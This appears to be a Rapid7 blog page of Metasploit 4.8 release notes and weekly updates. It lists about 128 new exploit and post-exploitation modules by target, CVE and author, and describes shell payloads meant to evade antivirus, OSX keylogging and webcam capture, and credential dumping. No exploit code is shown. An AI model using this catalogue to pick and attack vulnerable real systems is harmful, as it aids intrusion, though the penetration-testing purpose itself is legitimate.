Rapid7 Blog

Product Updates  

Don't Get Blindsided: Better Visibility Into User and Asset Risks with Metasploit 4.8

Not having visibility can be dangerous in many situations. The new Metasploit 4.8 gives you better visibility in four key areas:View phishing exposure in the context of the overall user riskSee which vulnerabilities pose the biggest risk to your organizationHave all host information…

Not having visibility can be dangerous in many situations. The new Metasploit 4.8 gives you better visibility in four key areas:View phishing exposure in the context of the overall user riskSee which vulnerabilities pose the biggest risk to your organizationHave all host information at your fingertips when doing a pentestDiscover the latest risks on your network with new exploits and other modulesSee Phishing Exposure as One Factor of User RiskUsers are often a weak part of the security chain, exposing organizations to attacks. This has led to a change in attacker methodology from brute force system-based attacks to deception-oriented attacks.  Especially phishing has seen a rise in recent years. Many organizations already conduct end-user trainings but find it challenging to determine how vulnerable their users really are and which users pose the largest risk.Rapid7 Metasploit Pro measures the effectiveness of security awareness trainings by running simulated phishing campaigns and integrates with Rapid7 UserInsight to provide this information in the context of a more comprehensive user risk, including network access, cloud service usage, and compromised credentials.What's new – the details:UserInsight can now pull phishing information through Metasploit Pro's Remote APIUserInsight provides an overview of the current status of each user and incorporates the phishing risk into the overall user riskSecurity professional can see user awareness trending over timeHere is how this helps you:Clear picture of user risks: Security analysts get a quick and clear picture of a user's accounts, network activity, cloud services, mobile devices, network activity and now phishing in one place, unifying information normally scattered across systems.More effective security program: Tracking the effectiveness of security awareness trainings means you can adapt them to become more effective over time.Metasploit Pro is the only phishing simulation solution that integrates with a solution to provide insight into user activity and risk. Unlike alternative penetration testing solutions, Metasploit Pro's social engineering reports provides conversion rates at each step in the campaign funnel, such as how many people clicked through a phishing email, how many entered username and password on a fake website, and how many systems were compromised. Only Metasploit provides advice on how to address risk at each step in the social engineering funnel.While some phishing simulation services can only measure user awareness, Metasploit Pro can also measure the effectiveness of technical controls. If desired, phishing web pages or email attachments can contain exploits that test patch levels, security configurations, and network-based defenses.Simulated phishing campaigns are exclusive to Metasploit Pro users.See which vulnerabilities pose the biggest risk to your organizationVulnerability scanners can determine installed software and its vulnerabilities but not whether it poses a real risk in the context of your network. This is dangerous and wasteful because IT teams need to fix all vulnerabilities with equal priority.Vulnerability validation helps you to determine if a vulnerability poses a high risk to your environment. It focuses on vulnerabilities with known public exploits that provide an easy way into your network - even for less experienced attackers.Metasploit Pro simplifies and expedites vulnerability validation. It provides a unified, guided interface, called the Vulnerability Validation Wizard, that walks you through each step of the vulnerability validation process - from importing Nexpose data to auto-exploiting vulnerabilities to sending the validation results back to Nexpose. You can even define exceptions for vulnerabilities that were not successfully exploited.Nexpose and Metasploit Pro seamlessly integrate to streamline the vulnerability validation workflow. It creates a closed-loop security risk assessment solution so that you can find potential vulnerabilities, exploit them, and identify the security flaws that pose a real threat to a network.After vulnerabilities have been validated, the results are returned to Nexpose, where exploitability of a vulnerability can be used to create reports and prioritize vulnerabilities for remediation.What's new – the details:Metasploit added a vulnerability validation wizard, greatly simplifying the vulnerability validation process.Exploited vulnerabilities are now marked in Nexpose with a special icon,Nexpose users can create a dynamic asset group containing validated vulnerabilities, making it easy to see how many machines fall into that group and enabling reporting and trending,Nexpose users can now filter by exploited vulnerabilities and create top remediations reports that provide clear instructions for the IT teams.Vulnerabilities discovered by Metasploit that were not part of the original Nexpose import are marked with a green “New” flag.Clear status next to each vulnerability in Metasploit on whether the vulnerability could be exploited.Faster and more robust import of vulnerability scans from Nexpose and third-party scannersHere is how this helps you:Reduced cost: Focusing on prioritized, high-risk vulnerabilities reduces the workload of the remediation team.Higher security assurance: Knowing which vulnerabilities pose a high risk and addressing them first reduces the likelihood that an attacker can get in.Higher credibility: Provide proof of exploitability to application owners to elevate the remediation discussion to an objective levelOnly Rapid7 offers closed-loop vulnerability validation, returning information about successful validations and vulnerability exceptions into the vulnerability management solution for easy remediation, reporting, and trending.Unlike other solutions, that require a manual XML export and import of vulnerability data, Metasploit Pro can pull existing scan data directly from Nexpose, through a supported API.Closed-loop vulnerability validation is exclusive to Metasploit Pro users.If you're interested to hear more about vulnerability validation and see a live demo, join our free webcast "Don't Trust, Validate! How to Determine the Real Risk of Your Vulnerabilities."Have all host information at your fingertips when doing a pentestWhile penetration testers are used to bending technology to suit their needs, solving difficult tasks is not an end it itself. Especially in large penetration tests, it can be challenging to manage a lot of data efficiently and without losing the overview. These difficulties can quickly cause longer work hours and overdue projects.Metasploit Pro makes it easier to carry out standard tasks and to manage the vast amount of information collected during a penetration test. This directly translates into time savings and a reduced training need for new staff. For example, Metasploit Pro manages data by tracking active projects, importing results from other sources, and now allowing manual input.What's new – the details:Overhauled usability of the single host view, the most used screen in Metasploit Pro, to provide all important data at a glance.New screen includes counts/stats for services, vulnerabilities, notes, credentials, captured data, file shares, exploit attempts, and matched modules.Pentesters can now manually add services, vulnerabilities, credentials, and captured data files they have discovered outside of Metasploit.Here is how this helps you:Reduced cost: Better usability means shorter project times, lower cost, and reduced training needs for new staffMetasploit Pro makes it much easier than Metasploit Framework to handle large penetration tests and bring new staff on board.The new single host view is available in Metasploit Community, Metasploit Express, and Metasploit Pro.128 New Modules in Metasploit 4.8.0: Routers, HP Enterprise Software, and Awesome PayloadsFirst off, we have 128 new modules since 4.7's release back in July (and you get bonus secgeek points if that count makes you a little nervous). That comes in at just about one and a half new modules a day, every day, since July 15. These modules are all over the place, since most of them come in unannounced to be cleaned up and put to work like so many Dickensian orphans. However, some themes did shake out with what we pursued in exploit-land for this release.We have eight new modules targeting SOHO routers and access points, from Michael Messner, Craig Heffner, Brandon Perry, and Juan Vazquez. SOHO router hacking has been a focus for Metasploit for about a year now, and we're still championing the idea that if you have work-from-home employees, or even high-priority targets like the CFO's laptop, SOHO routers like these should be in scope for your engagement. It's a discussion worth having, and the availability of Metasploit modules can help a penetration tester make his case.There are 24 new modules that exploit ZDI-disclosed vulnerabilities, 20 of which saw a bunch of work from Juan Vazquez, who I swear doesn't have it in for HP. It just so happens that over half of these ZDI vulns are targeting HP enterprise server software, including StorageWorks, LoadRunner, IMC, and Procurve Manager. ZDI bugs are great targets for exploit developers, because they represent popular software that you're likely to find in the enterprise, so penetration testers get a lot of mileage out of these.This release was unique among most in that there are some really neat new payloads; we now have new shell bind and reverse shell payloads in Lua and Node.js from xistence and Joe Vennix, respectively. These go along with our usual bash, VBS, Perl, Python, and assorted other language shells. If your client's IDS/IPS/AV vendor isn't paying attention, these new shell spawners might slip past their tried-and-true defenses. That said, I have to say that the most exciting new payload is a Python implementation of Meterpreter from Spencer McIntyre. This brings more Meterpreter functionality to pretty much any standard Linux build, and is getting much more active development than our old C-based POSIX Meterpreter.Oh, yes, and there's good old Windows Meterpreter. We've made huge improvements there, thanks to some phenomenal focused effort from OJ "TheColonial" Reeves. OJ has brought Meterpreter (sometimes kicking and screaming) to the modern era of C development, with a completely revamped build environment (using the free edition of Microsoft Visual Studio 2013) and continuous integration platform. Along the way, he smashed a huge pile of bugs and annoyances, both internally and externally reported. What this all means to users is that Meterpreter is slightly smaller and *much* more stable now, *and* it's totally amenable to open source C development. The days of having to incorporate every change with the tribal knowledge of James "Egypt" Lee and HD Moore are pretty much over.For exploit developers, we have a bunch of new brand new libraries for use: FireFart's WordPress manipulation API makes WP-specific assessments much easier, and Meatballs' WDSCP protocol library takes advantage of insecure Windows Deployment Services (are there any other kind?) to get a quick foothold in a WDS-imaged enterprise. Meatballs also contributed a handful of new binary templates for use with payload generation, including templates for PowerShell, VBA, MSI installers, and more, all of which complicate Metasploit's relationship with the various anti-virus vendors.Of course, that's not all, but those are the headline features for Metasploit Framework 4.8.0. We landed over 2,300 commits since mid-July; the summary above and the modules below represent the most visible changes. But with nearly a hundred non-Rapid7 people who got commits into the master repository for Metasploit Framework, it's really pretty impossible to give a complete rundown of every cool new thing that hit; for that, you can start by looking at the last four or five months' worth of blog posts, or even better, peruse the git shortlog (from your nearest git clone, type 'git shortlog 4.7.0...4.8.0').So, thanks to all the volunteers listed below for all your commits (and commitment!) to our collective open source security product, sorted by commit count, then alphabetically by first name or handle. You guys make Metasploit go.Meatballs1, FireFart, jiuweigui, Spencer McIntyre, m-1-k-3, several people calling themselves "root" (fix your .gitconfig, guys!), Nathan Einwechter, xistence, Rick Flores, Karn Ganeshen, MrXors, AverageSecurityGuy, Ramon de C Valle, Markus Wulftange, kaospunk, dummys, Bruno Morisson, RageLtMan, mubix, g0tmi1k, darknight007, bcoles, TecR0c, shellster, Charlie Eriksen, Rich Lundeen, Boris, bmerinofe, joernchen of Phenoelit, jgor, jamcut, ZeroChaos, trustedsec, Shelby Spencer, Sean Verity, Patrick Webster, Dhiru Kholia, ddouhine, Davy Douhine, Alexandre Maloteaux, Tyler Krpata, swtornio, Stephen Haywood, Ryan Wincey, Norbert Szetei, Nicholas Davis, kernelsmith, h0ng10, Frederic Basse, Daniele Martini, Brandon Perry, Brandon Knight, Winterspite, Vlatko Kosturjak, violet, tkrpata, Till Maas, scriptjunkie, Sagi Shahar, Ruslaideemin, Rick Flores, rbsec, pyoor, Paul, nmonkee, MosDefAssassin, Matt Andreko, Juushya, Joshua J. Drake, Jon Hart, Jonathan Rudenberg, Joff Thyer, Joe Barrett, Icewall, Henrik Kentsson, ethicalhack3r, Darren Martyn, corelanc0d3er, Borja Merino, Booboule, allfro, and Alexia Cole.New modules since 4.7.0:Exploit modulesAstium Remote Code Execution by xistence exploits OSVDB-88860D-Link Devices Unauthenticated Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-89861D-Link Devices Unauthenticated Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-92698D-Link DIR-605L Captcha Handling Buffer Overflow by juan vazquez and Craig Heffner exploits OSVDB-86824D-Link Devices UPnP SOAP Command Execution by juan vazquez and Michael Messner exploits OSVDB-94924D-Link Devices UPnP SOAP Telnetd Command Execution by juan vazquez and Michael Messner exploits OSVDB-94924Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection by Ramon de C Valle exploits CVE-2013-2121Linksys WRT110 Remote Command Execution by juan vazquez, Craig Young, and joev exploits CVE-2013-3568PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution by juan vazquez and Dave Weinstein exploits ZDI-13-185PineApp Mail-SeCure livelog.html Arbitrary Command Execution by juan vazquez and Unknown exploits ZDI-13-184PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution by juan vazquez and Dave Weinstein exploits ZDI-13-188Raidsonic NAS Devices Unauthenticated Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-90221Sophos Web Protection Appliance sblistpack Arbitrary Command Execution by juan vazquez and Francisco Falcon exploits CVE-2013-4983Zabbix 2.0.8 SQL Injection and Remote Code Execution by Jason Kratzer and Lincoln exploits CVE-2013-5743Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation by juan vazquez and Francisco Falcon exploits CVE-2013-4984VMWare Setuid vmware-mount Unsafe popen(3) by egyp7 and Tavis Ormandy exploits CVE-2013-1662HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow by juan vazquez and e6af8de8b1d4b2b6d5ba2610cbf9cd38 exploits ZDI-13-179Java storeImageArray() Invalid Array Indexing Vulnerability by sinn3r, juan vazquez, and Unknown exploits CVE-2013-2465Nodejs js-yaml load() Code Execution by Neal Poole and joev exploits CVE-2013-4660GestioIP Remote Command Execution by bperryGLPI install.php Remote Command Execution by Tristan Leiter exploits CVE-2013-5696HP System Management Homepage JustGetSNMPQueue Command Injection by sinn3r and Markus Wulftange exploits CVE-2013-3576VMware Hyperic HQ Groovy Script-Console Java Execution by Brendan ColesISPConfig Authenticated Arbitrary PHP Code Execution by Brandon Perry exploits CVE-2013-3629Linksys WRT110 Remote Command Execution by juan vazquez, Craig Young, and joev exploits CVE-2013-3568Moodle Remote Command Execution by Brandon Perry exploits CVE-2013-3630NAS4Free Arbitrary Remote Code Execution by Brandon Perry exploits CVE-2013-3631OpenMediaVault Cron Remote Command Execution by Brandon Perry exploits CVE-2013-3632OpenX Backdoor PHP Code Execution by egyp7 and Unknown exploits CVE-2013-4211ProcessMaker Open Source Authenticated PHP Code Execution by Brendan ColesRuby on Rails Known Secret Session Cookie Remote Code Execution by joernchen of PhenoelitApache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution by sinn3r, juan vazquez, and Takeshi Terada exploits CVE-2013-2251vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution by Brandon Perry exploits CVE-2013-3591Zabbix Authenticated Remote Command Execution by Brandon Perry exploits CVE-2013-3628Mac OS X Persistent Payload Installer by Marcin 'Icewall' Noga and joevMac OS X Sudo Password Bypass by juan vazquez, Todd C. Miller, and joev exploits CVE-2013-1775Western Digital Arkeia Remote Code Execution by xistence exploits OSVDB-97615ClipBucket Remote Code Execution by Gabby and xistenceFlashChat Arbitrary File Upload by Brendan Coles and x-hayben21 exploits OSVDB-98233Graphite Web Unsafe Pickle Handling by Charlie Eriksen exploits CVE-2013-5093Joomla Media Manager File Upload Vulnerability by juan vazquez and Jens Hinrichsen exploits CVE-2013-5576Open Flash Chart v2 Arbitrary File Upload by Braeden Thomas, Brendan Coles, Gjoko Krstic, and Halim Cruzito exploits CVE-2009-4140OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution by xistence exploits OSVDB-97482SPIP connect Parameter PHP Injection by Arnaud Pachot, Davy Douhine, and Frederic Cikala exploits OSVDB-83543Squash YAML Code Execution by Charlie Eriksen exploits CVE-2013-5036VICIdial Manager Send OS Command Injection by sinn3r, juan vazquez, Adam Caudill, and AverageSecurityGuy exploits CVE-2013-4468WebTester 5.x Command Execution by Brendan ColesZeroShell Remote Code Execution by Yann CAM and xistenceCA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow by MC exploits OSVDB-68330Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110HP LoadRunner lrFileIOService ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-182HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution by juan vazquez and Brian Gorenc exploits ZDI-13-207Microsoft Internet Explorer SetMouseCapture Use-After-Free by sinn3r and Unknown exploits MS13-080Firefox onreadystatechange Event DocumentViewerImpl Use After Free by sinn3r, juan vazquez, Nils, Unknown, and w3bd3vil exploits CVE-2013-1690Firefox XMLSerializer Use After Free by juan vazquez and regenrecht exploits ZDI-13-006MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free by sinn3r, Jose Antonio Vazquez Gonzalez, Orange Tsai, and Peter Vreugdenhil exploits MS13-055MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free by sinn3r and corelanc0d3r exploits MS13-059MS13-069 Microsoft Internet Explorer CCaret Use-After-Free by sinn3r and corelanc0d3r exploits MS13-069MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free by sinn3r and Unknown exploits MS13-080Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution by juan vazquez and rgod exploits OSVDB-93696EMC Replication Manager Command Execution by Davy Douhine and Unknown exploits ZDI-11-061A-PDF WAV to MP3 v1.0.0 Buffer Overflow by Dr_IDE, d4rk-h4ck3r, and dookie exploits OSVDB-67241Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110Beetel Connection Manager NetConfig.ini Buffer Overflow by metacom and wvu exploits OSVDB-98714Chasys Draw IES Buffer Overflow by juan vazquez, Christopher Gabriel, Javier 'soez', and Longinos Recuero Bustos exploits CVE-2013-3928MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution by juan vazquez and Eduardo Prado exploits MS13-071freeFTPd PASS Command Buffer Overflow by TecR0c and Wireghoul exploits OSVDB-96517Open-FTPD 1.2 Arbitrary File Upload by Brendan Coles and Serge Gorbunov exploits CVE-2010-2620PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow by Christian (Polunchis) Ramirez and Rick (nanotechz9l) Flores exploits OSVDB-94624Cogent DataHub HTTP Server Buffer Overflow by juan vazquez and rgod exploits ZDI-13-178HP Intelligent Management Center BIMS UploadServlet Directory Traversal by juan vazquez and rgod exploits ZDI-13-238HP Managed Printing Administration jobAcct Remote Command Execution by juan vazquez and Andrea Micalizzi exploits ZDI-11-352HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload by juan vazquez and rgod exploits ZDI-13-225HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload by juan vazquez and rgod exploits ZDI-13-226HP SiteScope Remote Code Execution by juan vazquez and rgod exploits ZDI-13-205Intrasrv 1.0 Buffer Overflow by PsychoSpy and xis_one exploits OSVDB-94097MiniWeb (Build 300) Arbitrary File Upload by AkaStep and Brendan Coles exploits OSVDB-92200Oracle Endeca Server Remote Command Execution by juan vazquez and rgod exploits ZDI-13-190Ultra Mini HTTPD Stack Buffer Overflow by PsychoSpy and superkojiman exploits CVE-2013-5019VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload by juan vazquez and Andrea Micalizzi exploits ZDI-13-147Agnitum Outpost Internet Security Local Privilege Escalation by juan vazquez and Ahmad Moghimi exploits OSVDB-96208IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL by Ben CampbellMS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation by Axel Souchet, Ben Campbell, and Tavis Ormandy exploits MS13-005Persistent Payload in Windows Volume Shadow Copy by Jedediah RodriguezWindows Management Instrumentation (WMI) Remote Command Execution by Ben Campbell exploits CVE-1999-0504Symantec Altiris DS SQL Injection by 3v0lver and Brett Moore exploits ZDI-08-024HP Data Protector Cell Request Service Buffer Overflow by juan vazquez and e6af8de8b1d4b2b6d5ba2610cbf9cd38 exploits ZDI-13-130HP LoadRunner magentproc.exe Overflow by juan vazquez and Unknown exploits ZDI-13-169PowerShell Payload Web Delivery by Ben Campbell and Chris CampbellInteractive Graphical SCADA System Remote Command Injection by Luigi Auriemma and MC exploits CVE-2011-1566Auxiliary and post modulesHP Intelligent Management SOM Account Creation by juan vazquez and rgod exploits ZDI-13-240Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment by Ramon de C Valle exploits CVE-2013-2113Nexpose XXE Arbitrary File Read by Bojan Zdrnja, Brandon Perry, and Drazen PopovicOpenbravo ERP XXE Arbitrary File Read by Brandon Perry exploits CVE-2013-3617Sophos Web Protection Appliance patience.cgi Directory Traversal by juan vazquez and Wolfgang Ettlingers exploits CVE-2013-2641vBulletin Administrator Account Creation by juan vazquez and Unknown exploits OSVDB-98370GE Proficy Cimplicity WebView substitute.bcl Directory Traversal by juan vazquez and Unknown exploits CVE-2013-0653SMB File Delete Utility by mubixSMB File Download Utility by mubixNode.js HTTP Pipelining Denial of Service by Marek Majkowski, joev, and titanous exploits CVE-2013-4450Samba read_nttrans_ea_list Integer Overflow by Jeremy Allison and dz_lnly exploits CVE-2013-4124HP ProCurve SNAC Domain Controller Credential Dumper by juan vazquez and rgodAuxilliary Parser Windows Unattend Passwords by Ben CampbellMicrosoft Windows Deployment Services Unattend Retrieval by Ben CampbellCisco Ironport Bruteforce Login Utility by Karn GaneshenDLink User-Agent Backdoor Scanner by juan vazquez, Craig Heffner, and Michael MessnerHP Intelligent Management BIMS DownloadServlet Directory Traversal by juan vazquez and rgod exploits ZDI-13-239HP Intelligent Management SOM FileDownloadServlet Arbitrary Download by juan vazquez and rgod exploits ZDI-13-242Jenkins Enumeration by Jeff McCutchanHost Information Enumeration via NTLM Authentication by Brandon KnightRadware AppDirector Bruteforce Login Utility by Karn GaneshenSentry Switched CDU Bruteforce Login Utility by Karn GaneshenSupermicro Onboard IPMI CGI Vulnerability Scanner by juan vazquez and hdm exploits CVE-2013-3623Supermicro Onboard IPMI Static SSL Certificate Scanner by juan vazquez and hdm exploits CVE-2013-3619Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal by juan vazquez and hdmSAP Host Agent Information Disclosure by Bruno Morisson exploits CVE-2013-3319Gather eCryptfs Metadata by Dhiru KholiaCUPS 1.6.1 Root File Read by Jann Horn and joev exploits CVE-2012-5519Multi Gather Resolve Hosts by Ben CampbellOSX Capture Userspace Keylogger by joevOSX Password Prompt Spoof by Joff Thyer and joevOSX Manage Record Microphone by joevOSX Manage Webcam by joevWindows Single Sign On Credential Collector (Mimikatz) by Ben CampbellWindows Gather DNS Cache by Borja MerinoWindows Gather Prefetch File Information by TJ GladWindows Resolve Hosts by Ben CampbellWindows Manage Set Port Forwarding With PortProxy by Borja MerinoThe new modules are available in all Metasploit editions, including Metasploit Pro, Metasploit Express, Metasploit Community, and Metasploit Framework.And It's All Available NowIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update

Disclosures for SuperMicro IPMIOn the heels of last week's bundle of FOSS disclosures, we've gone a totally different direction this week with a new round of disclosures. Today, we're concentrating on a single vendor which ships firmware for Baseboard Management Controllers (BMCs): Supermicro, and their…

Disclosures for SuperMicro IPMIOn the heels of last week's bundle of FOSS disclosures, we've gone a totally different direction this week with a new round of disclosures. Today, we're concentrating on a single vendor which ships firmware for Baseboard Management Controllers (BMCs): Supermicro, and their Supermicro IPMI firmware. You can read up on the details on HD's blog post which covers the five new CVEs.It's important to stress that the vulnerabilities discussed by HD don't actually have much of anything to do with the IPMI subsystems themselves; rather, the focus was on the web and SSH management interfaces. Because of this, there is plenty of opportunity for attackers to leverage these oft-overlooked network services to gain a foothold in your datacenter, especially if you have permissive or non-existent firewall rules that expose these services to the Internet; by default SuperMicro's IPMI web and SSH interfaces listen on TCP/443 and TCP/22, as you'd expect.A simple network misconfiguration such as a blanket "allow" rule on these ports, can accidentally expose these guys to the Internet. Experience shows that exposing management interfaces to the Internet is surprisingly common, and a quick peek at the Internet courtesy of Project Sonar shows that there are over 35,000 SUpermicro IPMI interfaces exposed to the world. Yikes.We're toiling away on putting together some reliable exploits and scanner modules for the vulnerabilities, so keep an eye on the Metasploit Framework Repository for those. And speaking of our open source repo...Signed Commits for Metasploit FrameworkIn Metasploit Framework development news, we've started getting serious about cryptographically signing our commits to Metasploit Framework. This was inspired by the most excellent blog post from Mike Gerwitz, A Git Horror Story: Repository Integrity with Signed Commits. At this point, pretty much all merges to Metasploit's master branch are signed with the committer's PGP key, and you can confirm the signatures yourself by this easy and not-so-fun two step process: First, get a hold of all the committer keys, and import them with your command line PGP/GPG application. Next, use the command "git log --show-signature --merges", and amaze at the cryptographic integrity of the most recent merges.For me, the main reason to do something like this is to add a layer of authenticity to our open source project -- by ensuring that commits to master are signed, even if one of our committers' GitHub account gets totally compromised, the attacker would still need to also compromise the committers' PGP key in order to reasonably impersonate him. For most sensible people (our committers included), that means compromising the local key store, which is a much smaller attack vector than GitHub. GitHub is great -- seriously, it is -- but it's big, popular, and always online (pretty much), so it's an attractive target for both focused attacks and general vandalism.Now, actually verifying these signatures automatically by end users is another story; sadly, I don't have any advice for you on how to automatically reject and revert unsigned commits. Today, I eyeball it manually, which of course, sucks. We've asked GitHub nicely to provide some kind of indicator on their web UI that a commit is signed, so I'm hopeful that that feature is Coming Soon. If you have any advice for nice signature-verifying git functionality, comment below, por favor!New ModulesWe have two new exploits this week: one for ProcessMaker Open Source by longtime contributor Brendan Coles, and one for Beetel Connecton Manager. The latter is the very first exploit module from our new hire, William Vu, so feel free to pay special attention to this module, and file lots of annoying bugs for him on our Redmine issue tracker. Thanks guys!Exploit modulesProcessMaker Open Source Authenticated PHP Code Execution by Brendan ColesBeetel Connection Manager NetConfig.ini Buffer Overflow by metacom and wvu exploits OSVDB-98714If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.Ninja Update: We have just landed three new auxiliary modules for the Supermicro issues that can help in scanning efforts; they'll be in next week's Metasploit update, but those of you who are following our bleeding-edge source can fetch them from GitHub.

Weekly Update: Exploiting (Kind of) Popular FOSS Apps

Disclosure for FOSS ProjectsEarlier today, we published seven modules for newly disclosed vulnerabilities that target seven free and open source (FOSS) projects, all discovered and written by long time Metasploit contributor Brandon Perry. These vulnerabilies moved through Rapid7's usual disclosure process, and as you can…

Disclosure for FOSS ProjectsEarlier today, we published seven modules for newly disclosed vulnerabilities that target seven free and open source (FOSS) projects, all discovered and written by long time Metasploit contributor Brandon Perry. These vulnerabilies moved through Rapid7's usual disclosure process, and as you can read in the summary blog post, it was a little bit of an adventure. These were not projects like Linux or Apache with bazillions of downloads and installed basically everywhere, but more on that second and third tier of free software projects which have merely millions of downloads or tens of thousands of users.One thing that occurred to me is that these may be the first, or at least among the first, vulnerabilities disclosed to many of these software vendors. Collectively, these applications have been downloaded more than 16 million times, so it seems weird that the vendors' disclosure handling wasn't a little more normalized.Of course, the way to get good at anything is to practice, so publishers of free software at this level of popularity could use some practice fielding new vulnerability disclosures. To that end, if you're a user of these applications (or other mildly popular applications), you may want to take a look at their openly published source and binaries to see if you can't uncover some vulnerabilities yourself. After all, that's part of the compact we have with FOSS publishers -- they make their materials free to open inspection, but someone actually has to do the inspection.As you can see in the technical writeup, most of these exposures aren't terribly complicated once you start looking. These issues were uncovered and exploited by Brandon primarily during some downtime at DEFCON 2013, so it's not like it was a particularly complicated approach to bug hunting.Inspecting open source software for security issues is a public good that pretty much anyone with technical chops can get into -- you can practice your exploit dev skills, and the software developers can practice handling disclosures once you report them -- either directly or through a third party like ZDI or your friends here at Rapid7. There are tons of books and websites on security best practices and vulnerability research to get you started, and lots of helpful researchers on the Internet to help you along the way. All I ask is that you disclose your findings reasonably and give the vendor time to patch and time to warn their user base about the issues. That way, you're not needlessly injecting extra instability into the Internet as a whole.A Quick Respin of 4.7.2You may have noticed that we didn't release an update for Metasploit last week. Instead, we were chasing down, fixing, and re-releasing the update to fix a bug in the way the Postgres database is upgraded for Metasploit Community and Metasploit Pro. If you haven't noticed any problems, you're in the majority, and there's no need to reapply anything -- the bug only appears to have hit (a very few) isolated platforms where the end users a) were not on supported platforms and b) had altered their own local database configurations. If you happen to be in this group, then simply reinstalling the newly re-released update will get you squared away. Again, this affected a small set of users (I can count them on one hand) and wasn't a security issue or anything, just configuration conflict.New ModulesWe're shipping a whopping 16 new exploits, including the seven from bperry, eight new auxiliary modules, and one new post module. At a grand total of 25 new modules, it's been a busy week in the People's Glorious Republic of Metasploit. Thanks to all various and sundry contributors for your efforts this week.Exploit modulesD-Link DIR-605L Captcha Handling Buffer Overflow by juan vazquez and Craig Heffner exploits OSVDB-86824ISPConfig Authenticated Arbitrary PHP Code Execution by Brandon Perry exploits CVE-2013-3629Moodle Remote Command Execution by Brandon Perry exploits CVE-2013-3630NAS4Free Arbitrary Remote Code Execution by Brandon Perry exploits CVE-2013-3631Openbravo ERP XXE Arbitrary File Read by Brandon Perry exploits CVE-2013-3617OpenMediaVault Cron Remote Command Execution by Brandon Perry exploits CVE-2013-3632vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution by Brandon Perry exploits CVE-2013-3591Zabbix Authenticated Remote Command Execution by Brandon Perry exploits CVE-2013-3628Mac OS X Persistent Payload Installer by Marcin 'Icewall' Noga and joevOpen Flash Chart v2 Arbitrary File Upload by Braeden Thomas, Brendan Coles, Gjoko Krstic, and Halim Cruzito exploits CVE-2009-4140WebTester 5.x Command Execution by Brendan ColesEMC Replication Manager Command Execution by Davy Douhine and Unknown exploits ZDI-11-061HP Intelligent Management Center BIMS UploadServlet Directory Traversal by juan vazquez and rgod exploits ZDI-13-238Persistent Payload in Windows Volume Shadow Copy by Jedediah RodriguezWindows Management Instrumentation (WMI) Remote Command Execution by Ben Campbell exploits CVE-1999-0504Interactive Graphical SCADA System Remote Command Injection by Luigi Auriemma and MC exploits CVE-2011-1566Auxiliary and post modulesHP Intelligent Management SOM Account Creation by juan vazquez and rgod exploits ZDI-13-240SMB File Delete Utility by mubixSMB File Download Utility by mubixNode.js HTTP Pipelining Denial of Service by Marek Majkowski, joev, and titanous exploits CVE-2013-4450HP Intelligent Management BIMS DownloadServlet Directory Traversal by juan vazquez and rgod exploits ZDI-13-239HP Intelligent Management SOM FileDownloadServlet Arbitrary Download by juan vazquez and rgod exploits ZDI-13-242Jenkins Enumeration by Jeff McCutchanRadware AppDirector Bruteforce Login Utility by Karn GaneshenWindows Single Sign On Credential Collector (Mimikatz) by Ben CampbellIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Meterpreter Updates, VMWare, the OSX spycam, Retabbing, and more!

Meterpreter UpdatesThis is a big week for Meterpreter. For starters, we've landed a new Meterpreter Python payload. Yes, yes, I know, you thought that Metasploit was all Ruby all the time, but this and the Python payloads for bind shells from Spencer McIntyre should help…

